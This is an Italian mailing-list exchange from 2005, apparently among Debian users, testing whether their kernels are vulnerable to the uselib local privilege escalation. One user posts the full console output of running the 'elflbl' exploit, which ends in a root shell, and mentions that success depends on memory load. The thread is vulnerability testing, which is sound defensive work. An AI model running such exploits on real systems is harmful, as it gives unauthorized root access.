On Mon, 10 Jan 2005, Maurizio Lemmo - Tannoiser wrote:
* lunedì 10 gennaio 2005, alle 01:35, Andrea Scrimieri scrive:
Da me vulnerabile anche sid. Attenzione che quell'errore non vuol dire
che il sistema non e' vulnerabile, ma solo che l'exploit in quella
circostanza non ha funzionato.
Avendo io tentato diverse volte in quella combinazione, tenderei ad
escludere l'accoppiata libc6 (piu` che definire la release) 2.3.2 e
2.4.26 stock debian.
Avro` tentato una 20ina di volte, anche tentando qualche switch. Il
massimo che ottengo, in quella combinazione, e`:
[-] FAILED: uselib (Cannot allocate memory)
(il che non esclude, eh).
andrea@mordicchio:~$ uname -a
Linux mordicchio 2.4.26-1-686 #1 Tue Aug 24 13:46:05 JST 2004 i686 GNU/Linux
andrea@mordicchio:~$ dpkg -l libc6 |grep libc6
ii libc6 2.3.2.ds1-20 GNU C Library: Shared libraries and Timezone
andrea@mordicchio:~$ ./elflbl
[+] SLAB cleanup
child 1 VMAs 65527
child 2 VMAs 65527
child 3 VMAs 65527
child 4 VMAs 65527
child 5 VMAs 65527
child 6 VMAs 65527
child 7 VMAs 65527
child 8 VMAs 65527
child 9 VMAs 65527
child 10 VMAs 65527
child 11 VMAs 49125
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xdf800000 - 0xfeee1000
Wait... /
[+] race won maps=60528
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xe07e1000
[+] gate modified ( 0xffec93bd 0x0804ec00 )
[+] exploited, uid=0
sh-3.00#
L'esito dell'exploit cambia a seconda della memoria occupata e
di applicazioni ne ho dovute lanciare un bel po' (circa 370 MB di
memoria usata). HTH
Ciao,
Andrea
|